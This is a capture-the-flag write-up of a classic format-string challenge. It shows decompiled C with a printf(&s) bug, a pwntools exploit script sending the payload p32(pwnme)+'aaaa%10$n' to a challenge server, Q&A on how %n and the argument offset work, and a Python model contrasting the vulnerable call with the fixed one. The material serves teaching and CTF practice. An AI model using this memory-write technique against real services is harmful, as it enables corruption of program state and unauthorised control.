This is regarded as a classic problem. The writeup I followed was very detailed, but I was sleepy and still did not really understand some points, so I am sorting out my ideas here.
int __cdecl main(int argc, const char **argv, const char **envp)
{
    int buf;          // [esp+1Eh] [ebp-7Eh]   name buffer (10 bytes read into buf/v5/v6)
    int v5;           // [esp+22h] [ebp-7Ah]
    __int16 v6;       // [esp+26h] [ebp-76h]
    char s;           // [esp+28h] [ebp-74h]   message buffer (100 bytes)
    unsigned int v8;  // [esp+8Ch] [ebp-10h]   stack canary

    v8 = __readgsdword(0x14u);
    setbuf(stdin, 0);
    setbuf(stdout, 0);
    setbuf(stderr, 0);
    buf = 0;
    v5 = 0;
    v6 = 0;
    memset(&s, 0, 0x64u);
    puts("please tell me your name:");
    read(0, &buf, 0xAu);
    puts("leave your message please:");
    fgets(&s, 100, stdin);
    printf("hello %s", &buf);
    puts("your message is:");
    printf(&s);       // format string bug: user input is used directly as the format
    if ( pwnme == 8 )
    {
        puts("you pwned me, here is your flag:\n");
        system("cat flag");
    }
    else
    {
        puts("Thank you!");
    }
    return 0;
}
Reading the pseudocode, we can see that as long as pwnme == 8 the flag is printed; the only way to change pwnme is through printf(&s), where our message is used as the format string.
from pwn import *

p = remote('111.198.29.45', 34352)
pwnme = 0x0804A068                      # address of the global pwnme

payload1 = 'aaaa'                       # name, not important
payload2 = p32(pwnme) + 'aaaa%10$n'     # 4 address bytes + 4 'a' = 8 bytes printed before %n

p.recvuntil('please tell me your name:\n')
p.sendline(payload1)
p.recvuntil('leave your message please:\n')
p.sendline(payload2)
print(p.recv())
print(p.recv())
# p.interactive()
Q: What does %10$n mean? A: %n writes the number of characters output so far to the address held by its argument, and 10$ selects the 10th argument (the 4-byte address we placed at the start of the string). [Here 8 characters have been output before %n (the 4 address bytes plus 'aaaa'), so 8 is written into pwnme.]
Q: Why offset 10? A: Found by debugging with gdb (PS: remember to chmod 777 the binary before debugging).
Here the offset address was located by entering '21'.
Q: What is the p32() function? A: pwntools provides a set of functions for packing and unpacking data in a given format. These functions start with p or u, followed by a number giving the bit width, e.g. p32 and u32.
printf(&s), where s = p32(pwnme) + 'aaaa%10$n' (it showed up as 'haaaa%10$n' because only the first address byte, 0x68 = 'h', is printable).
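To see why this payload stores exactly 8 into pwnme, here is an added Python model (my own, not part of the original writeup and not pwntools) of the small printf subset involved. It assumes the layout the writeup found (the buffer s sits at positional argument 10) and contrasts the vulnerable printf(&s) with the fixed printf("%s", &s).

```python
import re
import struct

PWNME = 0x0804A068   # address of pwnme, taken from the exploit script above
S_OFFSET = 10        # positional argument at which the buffer s was found

def p32(value):
    """4-byte little-endian pack, what pwntools' p32() does."""
    return struct.pack("<I", value)

SPEC = re.compile(rb"%(?:(\d+)\$)?([nsx])")

def simulate_printf(fmt, args, memory):
    """Toy model (not the real libc) of %s, %x and %n: %n stores the number
    of bytes output so far at the address held by its argument. 'N$' picks
    argument N (1-based); otherwise arguments are consumed in order."""
    out, next_arg, i = bytearray(), 0, 0
    while i < len(fmt):
        m = SPEC.match(fmt, i)
        if m is None:                     # ordinary byte, just output it
            out.append(fmt[i]); i += 1
            continue
        if m.group(1):
            idx = int(m.group(1)) - 1
        else:
            idx, next_arg = next_arg, next_arg + 1
        arg, conv = args[idx], m.group(2)
        if conv == b"n":
            memory[arg] = len(out)        # the write primitive
        elif conv == b"s":
            out += arg
        else:
            out += b"%x" % arg
        i = m.end()
    return bytes(out), memory

def stack_view(s):
    """Constructed stack: slots 1..9 hold other data, then the words of s."""
    words = s.ljust(-(-len(s) // 4) * 4, b"\0")
    return [0] * (S_OFFSET - 1) + [struct.unpack("<I", words[k:k + 4])[0]
                                   for k in range(0, len(words), 4)]

def vulnerable_message(msg):
    """printf(&s): the message IS the format string, so %n is interpreted."""
    _, mem = simulate_printf(msg, stack_view(msg), {PWNME: 0})
    return mem[PWNME]

def fixed_message(msg):
    """printf("%s", &s): the message is only an argument, never parsed."""
    _, mem = simulate_printf(b"%s", [msg], {PWNME: 0})
    return mem[PWNME]
```

vulnerable_message(p32(PWNME) + b"aaaa%10$n") yields 8 because exactly 8 bytes (address + 'aaaa') were output before %n ran, while fixed_message leaves pwnme untouched for the same input.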
References:
https://blog.csdn.net/zz_Caleb/article/details/88980866
https://adworld.xctf.org.cn/task/writeup?type=pwn&id=5050&number=2&grade=0&page=1